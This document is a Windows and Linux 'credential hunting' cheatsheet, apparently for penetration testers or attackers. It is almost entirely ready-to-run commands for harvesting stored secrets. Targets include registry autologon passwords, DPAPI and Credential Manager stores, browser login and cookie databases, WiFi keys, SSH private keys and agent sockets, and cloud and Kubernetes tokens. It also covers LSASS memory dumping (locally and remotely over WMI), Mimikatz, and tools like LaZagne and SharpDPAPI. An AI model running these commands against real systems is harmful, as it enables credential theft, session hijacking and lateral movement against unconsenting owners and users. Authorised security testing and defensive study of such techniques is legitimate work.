Windows & Linux Credential Hunting - Complete Cheatsheet¶
🪟 WINDOWS CREDENTIAL HUNTING¶
File System Credentials¶
Common Credential Locations¶
High-Value File Paths
# User directories
dir C:\Users\*\Desktop\*pass*.* /s
dir C:\Users\*\Documents\*pass*.* /s
dir C:\Users\*\Downloads\*pass*.* /s
# Common password files
findstr /si password *.txt *.xml *.config *.cfg *.conf *.ini *.vbs *.js *.asp *.aspx *.php *.jsp
findstr /si pwd *.txt *.xml *.config
findstr /si credential *.txt *.xml *.config
# Specific patterns
dir /s *pass* == *cred* == *vnc* == *.config*
dir /s /b *unattend.xml* *sysprep.xml* *sysprep.inf* *unattended.xml*
# PowerShell history
Get-Content (Get-PSReadlineOption).HistorySavePath
Get-Content C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Command history
doskey /history
# Interesting file extensions
Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.config -File -Recurse -ErrorAction SilentlyContinue
Unattended Installation Files¶
Windows Deployment Credentials
# Unattend.xml locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
# Search for answer files
Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml,autounattend.xml -ErrorAction SilentlyContinue
# Parse for passwords (Base64 encoded in unattend.xml)
$xml = [xml](Get-Content C:\Windows\Panther\unattend.xml)
$xml.unattend.settings.component | Where-Object {$_.UserAccounts} | ForEach-Object {$_.UserAccounts.AdministratorPassword}
# Decode Base64 password
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("BASE64_PASSWORD_HERE"))
Configuration Files¶
Application Configuration Mining
# IIS Configuration
Get-Content C:\inetpub\wwwroot\web.config | Select-String -Pattern "password"
Get-Content C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | Select-String -Pattern "connectionString"
# Apache/XAMPP
Get-Content C:\xampp\apache\conf\httpd.conf
Get-Content C:\xampp\mysql\bin\my.ini
Get-Content C:\xampp\filezilla\FileZilla*.xml
Get-Content C:\xampp\phpMyAdmin\config.inc.php
# Database configs
Get-ChildItem -Path C:\ -Include *.config,*.conf,*.cfg -File -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString|password|pwd"
# Application specific
Get-Content "C:\Program Files\*\*.config" | Select-String -Pattern "password"
Get-Content "C:\Program Files (x86)\*\*.config" | Select-String -Pattern "password"
Registry Credentials¶
Auto-Logon Credentials¶
Registry AutoLogon Passwords
# AutoLogon credentials (plaintext!)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
# Alternative locations
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon"
# PowerShell method
Get-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Select-Object Default*
Saved Windows Credentials¶
Registry Credential Storage
# RunAs credentials
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAs /s
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAs /s
# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HostName UserName PublicKeyFile PortForwardings"
# WinSCP
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server" /v Password
# SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Service Credentials¶
Service Account Enumeration
# Services with credentials
Get-WmiObject win32_service | Where-Object {$_.StartName -ne "LocalSystem" -and $_.StartName -ne "NT AUTHORITY\LocalService" -and $_.StartName -ne "NT AUTHORITY\NetworkService"} | Select-Object Name, StartName, DisplayName
# Registry service passwords (encrypted)
reg query HKLM\SYSTEM\CurrentControlSet\Services /s /f "ObjectName"
# Specific service checks
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT" /v ObjectName
reg query "HKLM\SYSTEM\CurrentControlSet\Services\MSSQLSERVER" /v ObjectName
# PowerShell detailed
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services\" | ForEach-Object {
$service = $_
$account = (Get-ItemProperty $service.PSPath -Name ObjectName -ErrorAction SilentlyContinue).ObjectName
if ($account -and $account -ne "LocalSystem") {
Write-Output "$($service.PSChildName): $account"
}
}
Credential Manager & DPAPI¶
Windows Credential Manager¶
Credential Manager Extraction
# List stored credentials
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
# PowerShell enumeration
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
# Using rundll32
rundll32.exe keymgr.dll,KRShowKeyMgr
# Detailed credential enumeration
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Credentials\" -Force
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Credentials\" -Force
# Web credentials
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Vault\" -Force
# With Mimikatz (if available)
sekurlsa::credman
vault::cred /patch
DPAPI Secrets¶
DPAPI Blob Hunting
# Find DPAPI master keys
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Protect\*" -Force
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Protect\*" -Force
# Find credential files
Get-ChildItem -Path "C:\Users\*\AppData\*\Microsoft\Credentials\*" -Force -Recurse
# Chrome passwords (encrypted with DPAPI)
$chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
Copy-Item $chromePath "$env:TEMP\Login Data"
# Edge passwords
$edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear
# PowerShell method for all WiFi passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{SSID=$name;PASSWORD=$pass}}
Database Credentials¶
SQL Server¶
SQL Server Credential Hunting
# Find SQL Server instances
Get-Service -Name "*SQL*"
# SQL connection strings in registry
reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server" /s /f connectionstring
# Check SQL Server error logs
Get-Content "C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG*" | Select-String -Pattern "password"
# .udl files (Universal Data Link)
Get-ChildItem -Path C:\ -Include *.udl -File -Recurse -ErrorAction SilentlyContinue
# SQL command history
Get-Content "$env:APPDATA\Microsoft\SQL Server Management Studio\*.SqlStudio\*\QueryHistory\*"
Get-Content "$env:APPDATA\Microsoft SQL Server Management Studio\*\SqlStudio\Settings\SQL*"
# SSMS recent connections
Get-Content "$env:APPDATA\Microsoft\SQL Server Management Studio\18.0\UserSettings.xml" | Select-String -Pattern "Connection"
# Check for .sql files with credentials
Get-ChildItem -Path C:\ -Include *.sql -File -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password|pwd"
Other Databases¶
Database Configuration Files
# MySQL
Get-Content "C:\ProgramData\MySQL\MySQL Server *\my.ini"
Get-Content "C:\Program Files\MySQL\MySQL Server *\my.ini"
# PostgreSQL
Get-Content "C:\Program Files\PostgreSQL\*\data\postgresql.conf"
Get-Content "C:\Program Files\PostgreSQL\*\data\pg_hba.conf"
# MongoDB
Get-Content "C:\Program Files\MongoDB\Server\*\bin\mongod.cfg"
# Oracle
Get-Content "C:\app\oracle\product\*\dbhome_*\NETWORK\ADMIN\tnsnames.ora"
Get-Content "C:\app\oracle\product\*\dbhome_*\NETWORK\ADMIN\sqlnet.ora"
Browser Credentials¶
Browser Password Stores¶
Browser Credential Extraction
# Chrome
$chromePath = @(
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Web Data"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
)
# Firefox
Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles\*.default*\" -Include "logins.json","key*.db","cert*.db" -ErrorAction SilentlyContinue
# Edge
$edgePath = @(
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Cookies"
)
# Internet Explorer / Edge Legacy
# Stored in Credential Manager (see above)
# Opera
"$env:APPDATA\Opera Software\Opera Stable\Login Data"
# Brave
"$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default\Login Data"
# Using PowerShell to extract Chrome passwords (requires user context)
Add-Type -AssemblyName System.Security
$chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
$tempPath = "$env:TEMP\chromelogins"
Copy-Item $chromePath $tempPath
# Use SQLite to read (if available)
# Or use tools like SharpChrome, ChromePass
Browser History & Cookies¶
Session Token Extraction
# Chrome cookies (SQLite database)
$cookiePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Copy-Item $cookiePath "$env:TEMP\cookies.db"
# Firefox cookies
Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles\*.default*\cookies.sqlite"
# Check for saved forms data
$webDataPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Web Data"
# Browser history for credential URLs
$historyPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
Email & Communication Clients¶
Outlook Credentials¶
Outlook Password Extraction
# Outlook profiles
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook" /s
reg query "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook" /s
# PST file locations
Get-ChildItem -Path C:\Users\* -Include *.pst,*.ost -Recurse -ErrorAction SilentlyContinue
# Outlook passwords in registry (encrypted)
reg query "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles" /s /f password
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles" /s /f password
# NK2 autocomplete files (email addresses)
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Outlook\*.NK2"
Other Email Clients¶
Email Client Configurations
# Thunderbird
Get-ChildItem -Path "$env:APPDATA\Thunderbird\Profiles\*.default*\" -Include "logins.json","key*.db"
# Windows Mail
Get-ChildItem -Path "$env:LOCALAPPDATA\Packages\microsoft.windowscommunicationsapps*\LocalState" -Recurse -Include "*.edb"
# Check for email configuration files
Get-ChildItem -Path C:\ -Include *.pst,*.ost,*.eml,*.msg,*.edb -Recurse -ErrorAction SilentlyContinue
Application-Specific Credentials¶
Remote Access Tools¶
Remote Access Credentials
# TeamViewer
reg query "HKLM\SOFTWARE\TeamViewer" /s
reg query "HKCU\SOFTWARE\TeamViewer" /s
# AnyDesk
Get-Content "$env:APPDATA\AnyDesk\*.conf"
Get-Content "$env:PROGRAMDATA\AnyDesk\*.conf"
# RDP files
Get-ChildItem -Path C:\Users\* -Include *.rdp -Recurse -ErrorAction SilentlyContinue
Get-Content C:\Users\*\*.rdp | Select-String -Pattern "username|password"
# RDP saved credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
# VNC
Get-ChildItem -Path "C:\Program Files\RealVNC\VNC Server" -Include *.vnc,*.config
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Remote Desktop Manager
Get-Content "$env:LOCALAPPDATA\Devolutions\RemoteDesktopManager\*.cfg"
Development Tools¶
Developer Credential Stores
# Git credentials
Get-Content "$env:USERPROFILE\.git-credentials"
Get-Content "$env:USERPROFILE\.gitconfig"
git config --list --show-origin
# Visual Studio
Get-ChildItem -Path "$env:LOCALAPPDATA\Microsoft\VisualStudio\*\Settings\*.vssettings"
Get-Content "$env:APPDATA\Microsoft\VisualStudio\*\*.suo" -ErrorAction SilentlyContinue
# VS Code
Get-Content "$env:APPDATA\Code\User\settings.json"
Get-ChildItem -Path "$env:USERPROFILE\.vscode\extensions" -Include settings.json,config.json -Recurse
# JetBrains IDEs
Get-ChildItem -Path "$env:USERPROFILE\.IntelliJIdea*\config" -Include *.xml -Recurse | Select-String -Pattern "password"
# Docker
Get-Content "$env:USERPROFILE\.docker\config.json"
# Kubernetes
Get-Content "$env:USERPROFILE\.kube\config"
# AWS CLI
Get-Content "$env:USERPROFILE\.aws\credentials"
Get-Content "$env:USERPROFILE\.aws\config"
# Azure CLI
Get-Content "$env:USERPROFILE\.azure\accessTokens.json"
Get-Content "$env:USERPROFILE\.azure\azureProfile.json"
Password Managers¶
Password Manager Databases
# KeePass
Get-ChildItem -Path C:\ -Include *.kdbx,*.kdb -Recurse -ErrorAction SilentlyContinue
# LastPass
Get-ChildItem -Path "$env:LOCALAPPDATA\LastPass" -Include *.psafe3
# 1Password
Get-ChildItem -Path "$env:LOCALAPPDATA\1Password" -Include *.sqlite,*.opvault
# Dashlane
Get-ChildItem -Path "$env:APPDATA\Dashlane" -Include *.db,*.aes
# Bitwarden
Get-ChildItem -Path "$env:APPDATA\Bitwarden" -Include data.json
# RoboForm
Get-ChildItem -Path "$env:APPDATA\RoboForm\Profiles" -Include *.rfo
Advanced Techniques¶
Memory Scraping¶
In-Memory Credential Extraction
# Process memory dump (without Mimikatz)
# Using ProcDump (Microsoft signed)
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Using comsvcs.dll (living off the land)
Get-Process lsass | ForEach-Object {
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $_.Id C:\temp\lsass.dmp full
}
# Task Manager method (GUI)
# Right-click lsass.exe -> Create dump file
# Search process memory for passwords
Get-Process | Where-Object {$_.ProcessName -match "chrome|firefox|outlook|ssms"} | ForEach-Object {
Write-Host "Checking process: $($_.ProcessName)"
# Would need memory reading tool here
}
# WMI for remote dumping
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full"
Scheduled Tasks & Scripts¶
Automation Credential Mining
# Scheduled tasks with saved credentials
schtasks /query /xml | Select-String -Pattern "UserId|password"
schtasks /query /fo LIST /v | findstr "User:"
# PowerShell scheduled jobs
Get-ScheduledJob | Get-JobTrigger
# Task XML files
Get-ChildItem -Path "C:\Windows\System32\Tasks" -Recurse -Include *.xml | Select-String -Pattern "password|UserId"
# Startup scripts
Get-ChildItem -Path "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" -Include *.bat,*.cmd,*.ps1
# GPO scripts
Get-ChildItem -Path "C:\Windows\SYSVOL\*" -Include *.xml,*.bat,*.ps1 -Recurse | Select-String -Pattern "password"
LINUX CREDENTIAL HUNTING¶
File System Credentials¶
Common Credential Locations¶
Linux High-Value Paths
# Search for passwords in common locations
grep -r "password" /home/* 2>/dev/null
grep -r "passwd" /home/* 2>/dev/null
grep -r "pwd" /home/* 2>/dev/null
find / -name "*pass*" 2>/dev/null
# Specific file patterns
find / -type f \( -name "*.txt" -o -name "*.cfg" -o -name "*.conf" -o -name "*.config" -o -name "*.ini" \) -exec grep -l password {} \; 2>/dev/null
# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history
cat ~/.redis_history
cat /home/*/.bash_history
# Hidden files with credentials
find /home -name ".*" -type f -exec grep -l password {} \; 2>/dev/null
# Backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | xargs grep -l password 2>/dev/null
# Log files
grep -r "password" /var/log/* 2>/dev/null
grep -r "pwd" /var/log/* 2>/dev/null
# Temporary files
ls -la /tmp /var/tmp /dev/shm
find /tmp -type f -exec grep -l password {} \; 2>/dev/null
Shell Configuration Files¶
Shell RC Files & Environment
# Bash configuration
cat ~/.bashrc
cat ~/.bash_profile
cat ~/.profile
cat /etc/profile
# Check all users
for user in $(cut -d: -f1 /etc/passwd); do
echo "=== $user ==="
[ -f /home/$user/.bashrc ] && grep -E "export.*PASS|export.*KEY|export.*TOKEN" /home/$user/.bashrc
[ -f /home/$user/.profile ] && grep -E "PASS|KEY|TOKEN" /home/$user/.profile
done
# Environment variables
env | grep -i pass
env | grep -i key
env | grep -i token
set | grep -i pass
# Aliases might contain passwords
alias
# Functions in shell
declare -f | grep -i pass
SSH Credentials¶
SSH Keys & Configuration¶
SSH Key Discovery
# Find SSH keys
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null
# SSH directories
ls -la ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/authorized_keys
cat ~/.ssh/known_hosts
cat ~/.ssh/config
# All users' SSH keys
for user in $(cut -d: -f1 /etc/passwd); do
[ -d /home/$user/.ssh ] && echo "=== $user SSH ===" && ls -la /home/$user/.ssh/
done
# SSH agent
ssh-add -l
# Check for SSH key passphrases in files
grep -r "BEGIN RSA PRIVATE KEY" /home 2>/dev/null
grep -r "BEGIN OPENSSH PRIVATE KEY" /home 2>/dev/null
# SSH config for saved connections
cat /etc/ssh/ssh_config
grep -r "Host " ~/.ssh/config 2>/dev/null
SSH Session Hijacking¶
Active SSH Session Abuse
# Find SSH agent sockets
find /tmp -type s -name "agent.*" 2>/dev/null
ls -la /tmp/ssh-*
# List SSH connections
netstat -tnpa | grep ':22'
ss -tnpa | grep ':22'
lsof -i :22
# Check for SSH multiplexing sockets
find ~/.ssh -name "*master*" 2>/dev/null
ls -la ~/.ssh/controlmaster/
# Hijack SSH agent
export SSH_AUTH_SOCK=/tmp/ssh-XXX/agent.XXX
ssh-add -l
Database Credentials¶
MySQL/MariaDB¶
MySQL Credential Hunting
# MySQL configuration files
cat /etc/mysql/my.cnf
cat /etc/mysql/mysql.conf.d/*.cnf
cat /etc/mysql/mariadb.conf.d/*.cnf
cat ~/.my.cnf
cat /root/.my.cnf
# MySQL history
cat ~/.mysql_history
cat /root/.mysql_history
# Debian maintenance account
cat /etc/mysql/debian.cnf
# Search for MySQL passwords
grep -r "password" /etc/mysql/ 2>/dev/null
grep -r "mysql" /var/www/ 2>/dev/null | grep -i pass
# Check running MySQL process
ps aux | grep mysql
cat /proc/$(pidof mysqld)/cmdline
# MySQL data directory
ls -la /var/lib/mysql/
# Application configs with DB passwords
find /var/www -name "*.php" -exec grep -l "mysql_connect\|mysqli_connect\|new PDO" {} \;
PostgreSQL¶
PostgreSQL Credentials
# PostgreSQL config
cat /etc/postgresql/*/main/postgresql.conf
cat /etc/postgresql/*/main/pg_hba.conf
# User password file
cat ~/.pgpass
cat /root/.pgpass
cat /var/lib/postgresql/.pgpass
# PostgreSQL history
cat ~/.psql_history
cat /var/lib/postgresql/.psql_history
# Environment variables
echo $PGPASSWORD
echo $PGUSER
# Search for connection strings
grep -r "postgresql://" /var/www/ 2>/dev/null
grep -r "psql" /home/* 2>/dev/null | grep -i pass
Redis/MongoDB/Other NoSQL¶
NoSQL Credentials
# Redis
cat /etc/redis/redis.conf | grep -i requirepass
cat /etc/redis/redis.conf | grep -i masterauth
cat ~/.rediscli_history
# MongoDB
cat /etc/mongod.conf
cat /etc/mongodb.conf
grep -i "mongodb://" /var/www/* -r 2>/dev/null
# CouchDB
cat /etc/couchdb/local.ini
cat /opt/couchdb/etc/local.ini
# Elasticsearch
cat /etc/elasticsearch/elasticsearch.yml
Web Server Credentials¶
Apache¶
Apache Configuration Mining
# Apache config files
cat /etc/apache2/apache2.conf
cat /etc/httpd/conf/httpd.conf
grep -r "Password" /etc/apache2/ 2>/dev/null
grep -r "Password" /etc/httpd/ 2>/dev/null
# .htaccess and .htpasswd files
find /var/www -name ".htpasswd" -o -name ".htaccess" 2>/dev/null
find /var/www -name ".htpasswd" -exec cat {} \; 2>/dev/null
# Apache environment variables
cat /etc/apache2/envvars
# Virtual hosts
cat /etc/apache2/sites-available/*
cat /etc/httpd/conf.d/*
# Apache logs for passwords
grep -i "password" /var/log/apache2/*.log 2>/dev/null
grep -i "pwd" /var/log/httpd/*.log 2>/dev/null
Nginx¶
Nginx Credential Discovery
# Nginx config
cat /etc/nginx/nginx.conf
grep -r "password" /etc/nginx/ 2>/dev/null
# Site configurations
cat /etc/nginx/sites-available/*
cat /etc/nginx/conf.d/*
# Basic auth files
find /etc/nginx -name "*.passwd" 2>/dev/null
find /etc/nginx -name "*.users" 2>/dev/null
# Proxy configurations (may contain upstream passwords)
grep -r "proxy_set_header" /etc/nginx/ | grep -i auth
PHP/Web Applications¶
Web Application Credentials
# WordPress
find /var/www -name "wp-config.php" -exec grep -H "DB_PASSWORD\|DB_USER" {} \; 2>/dev/null
# Drupal
find /var/www -name "settings.php" -exec grep -H "database\|password" {} \; 2>/dev/null
# Joomla
find /var/www -name "configuration.php" -exec grep -H "password\|user" {} \; 2>/dev/null
# Laravel
find /var/www -name ".env" -exec cat {} \; 2>/dev/null
# Generic PHP config
find /var/www -type f -name "*.php" -exec grep -l "password\|passwd\|mysql_connect\|mysqli_connect" {} \; 2>/dev/null
# Config files in web root
find /var/www -name "config.php" -o -name "config.inc.php" -o -name "database.php" 2>/dev/null | xargs grep -i password 2>/dev/null
# Git repositories in web root (often contain passwords)
find /var/www -name ".git" -type d 2>/dev/null
Service Configurations¶
Systemd Services¶
Service Credential Extraction
# Systemd service files
grep -r "Environment=" /etc/systemd/system/ 2>/dev/null | grep -i pass
grep -r "ExecStart=" /etc/systemd/system/ 2>/dev/null | grep -i pass
# List all services and check for credentials
systemctl list-units --type=service --all | while read service _; do
systemctl cat "$service" 2>/dev/null | grep -i "password\|token\|key"
done
# Check service environment
for service in $(systemctl list-units --type=service --state=running --no-pager | awk '{print $1}' | grep -v "^UNIT"); do
systemctl show "$service" | grep -i "environment"
done
Cron Jobs¶
Cron Job Credentials
# System crontabs
cat /etc/crontab
ls -la /etc/cron.*
# User crontabs
for user in $(cut -d: -f1 /etc/passwd); do
crontab -l -u $user 2>/dev/null | grep -v "^#" | grep -v "^$"
done
# Cron files that might contain passwords
grep -r "password" /etc/cron* 2>/dev/null
find /etc/cron* -type f -exec grep -l "mysql\|psql\|mongo\|redis-cli" {} \; 2>/dev/null
# Backup scripts often have credentials
find /etc/cron* -name "*backup*" -exec cat {} \; 2>/dev/null
Container & Cloud Credentials¶
Docker¶
Docker Credential Mining
# Docker config
cat ~/.docker/config.json
cat /root/.docker/config.json
# Docker compose files
find / -name "docker-compose.yml" -o -name "docker-compose.yaml" 2>/dev/null | xargs grep -i password
# Environment variables in running containers
docker inspect $(docker ps -q) | grep -i "password\|key\|token"
# Docker secrets
docker secret ls
ls -la /run/secrets/
ls -la /var/lib/docker/secrets/
# Images with embedded credentials
docker history --no-trunc $(docker images -q) | grep -i password
Kubernetes¶
Kubernetes Secrets
# Kubernetes config
cat ~/.kube/config
cat /root/.kube/config
# Service account tokens
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /run/secrets/kubernetes.io/serviceaccount/token
# Kubernetes secrets (if kubectl available)
kubectl get secrets --all-namespaces
kubectl get secret <secret-name> -o jsonpath="{.data.password}" | base64 -d
# Environment variables in pods
kubectl exec -it <pod> -- env | grep -i password
Cloud Provider Credentials¶
Cloud Platform Credentials
# AWS
cat ~/.aws/credentials
cat ~/.aws/config
cat /root/.aws/credentials
env | grep AWS_
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure
cat ~/.azure/accessTokens.json
cat ~/.azure/azureProfile.json
env | grep AZURE_
# GCP
cat ~/.config/gcloud/credentials.db
cat ~/.config/gcloud/access_tokens.db
cat ~/.config/gcloud/application_default_credentials.json
env | grep GOOGLE_
# Generic cloud-init
cat /var/lib/cloud/instance/user-data.txt
cat /var/lib/cloud/instance/user-data.txt.i
Memory & Process Credentials¶
Process Environment¶
Live Process Credential Extraction
# Check all process environments
for pid in $(ls /proc | grep -E '^[0-9]+
); do
if [ -r /proc/$pid/environ ]; then
tr '\0' '\n' < /proc/$pid/environ | grep -i "password\|key\|token" 2>/dev/null && echo "PID: $pid"
fi
done
# Specific process command lines
ps aux | grep -i "password\|pwd"
ps aux | grep -E "mysql|postgres|mongo|redis" | grep -v grep
# Full command line arguments
cat /proc/*/cmdline 2>/dev/null | strings | grep -i password
# Check specific service processes
for service in mysql postgresql mongodb redis apache2 nginx; do
pgrep $service | while read pid; do
[ -r /proc/$pid/environ ] && tr '\0' '\n' < /proc/$pid/environ | grep -i pass
done
done
Memory Dumps¶
Memory Analysis
# Create memory dump (requires root)
gcore -o /tmp/dump <PID>
# Search memory dump for passwords
strings /tmp/dump.* | grep -i password
strings /tmp/dump.* | grep -E "^[a-zA-Z0-9+/]{20,}={0,2}$" # Base64
# Use gdb to dump process memory
gdb -p <PID> -batch -ex "dump memory /tmp/mem.dump 0x0 0xFFFFFFFFFFFFFFFF" 2>/dev/null
# LaZagne for Linux
python laZagne.py all
AUTOMATED TOOLS¶
Windows Credential Hunting Tools¶
Seatbelt¶
Seatbelt - Comprehensive Windows Enumeration
# Full credential audit
.\Seatbelt.exe -group=user
.\Seatbelt.exe -group=misc
.\Seatbelt.exe -group=chromium
.\Seatbelt.exe -group=remote
.\Seatbelt.exe -group=slack
# All checks (comprehensive)
.\Seatbelt.exe -group=all
# Specific credential checks
.\Seatbelt.exe CredEnum
.\Seatbelt.exe CloudCredentials
.\Seatbelt.exe ChromiumPresence
.\Seatbelt.exe FirefoxPresence
.\Seatbelt.exe IEFavorites
.\Seatbelt.exe KeePass
.\Seatbelt.exe MobaXterm
.\Seatbelt.exe PuttyHostKeys
.\Seatbelt.exe PuttySessions
.\Seatbelt.exe RDPSavedConnections
.\Seatbelt.exe SlackDownloads
.\Seatbelt.exe SuperPutty
.\Seatbelt.exe WindowsVault
# Output to file
.\Seatbelt.exe -group=all -outputfile=C:\Temp\seatbelt.txt
LaZagne (Multi-Platform)¶
LaZagne - All-in-One Password Recovery
# Windows - All modules
laZagne.exe all
# Specific modules
laZagne.exe browsers
laZagne.exe chats
laZagne.exe databases
laZagne.exe games
laZagne.exe git
laZagne.exe mails
laZagne.exe memory
laZagne.exe multimedia
laZagne.exe php
laZagne.exe svn
laZagne.exe sysadmin
laZagne.exe wifi
laZagne.exe windows
# Run with specific user context
laZagne.exe all -v
# Output to JSON
laZagne.exe all -oJ
SessionGopher¶
SessionGopher - Remote Session Extraction
# Import module
Import-Module .\SessionGopher.ps1
# Local system
Invoke-SessionGopher -Thorough
# Remote systems
Invoke-SessionGopher -ComputerName server01 -Thorough
Invoke-SessionGopher -ComputerName (Get-Content servers.txt) -Thorough
# With credentials
$cred = Get-Credential
Invoke-SessionGopher -ComputerName server01 -Credential $cred
# Output all findings
Invoke-SessionGopher -AllDomain -o output.txt
# Specific products
Invoke-SessionGopher -Product PuTTY
Invoke-SessionGopher -Product WinSCP
Invoke-SessionGopher -Product FileZilla
Invoke-SessionGopher -Product SuperPutty
Invoke-SessionGopher -Product RDP
SharpDPAPI¶
SharpDPAPI - DPAPI Abuse Tool
# Triage all master keys
.\SharpDPAPI.exe triage
# Decrypt credentials
.\SharpDPAPI.exe credentials
# Chrome passwords
.\SharpDPAPI.exe chrome /unprotect
# With specific master key
.\SharpDPAPI.exe blob /target:C:\Users\user\AppData\Local\Microsoft\Credentials\XXXXX /masterkey:YYYYY
# RDP files
.\SharpDPAPI.exe rdg /unprotect
# Certificates
.\SharpDPAPI.exe certificates /machine
Linux Credential Hunting Tools¶
LinPEAS¶
LinPEAS - Linux Privilege Escalation
# Full scan with password search
./linpeas.sh -a 2>&1 | tee linpeas_output.txt
# Fast mode focusing on passwords
./linpeas.sh -P
# Search for passwords in specific paths
./linpeas.sh -p /var/www,/home,/opt
# Quiet mode with interesting files only
./linpeas.sh -q
Linux Smart Enumeration (LSE)¶
LSE - Focused Credential Search
# Level 0 - Basic
./lse.sh
# Level 1 - Interesting files
./lse.sh -l 1
# Level 2 - Detailed search including passwords
./lse.sh -l 2
# With color output
./lse.sh -c
# Search for specific user
./lse.sh -u username
Mimipenguin¶
Mimipenguin - Linux Memory Passwords
# Python version
python3 mimipenguin.py
# Shell version
./mimipenguin.sh
# Dump specific process
python3 mimipenguin.py -p <PID>
CREDENTIAL HUNTING METHODOLOGY¶
Assessment Questions Framework¶
Key Questions to Answer During Assessment
Initial Access Context:
- What type of access do I have? (User/Admin/System/Root)
- What services is this system running?
- What applications are installed?
- Who else uses this system?
- What network segment am I in?
Credential Discovery Priority:
- Are there password managers installed?
- What browsers are present and used?
- Are there database clients/servers?
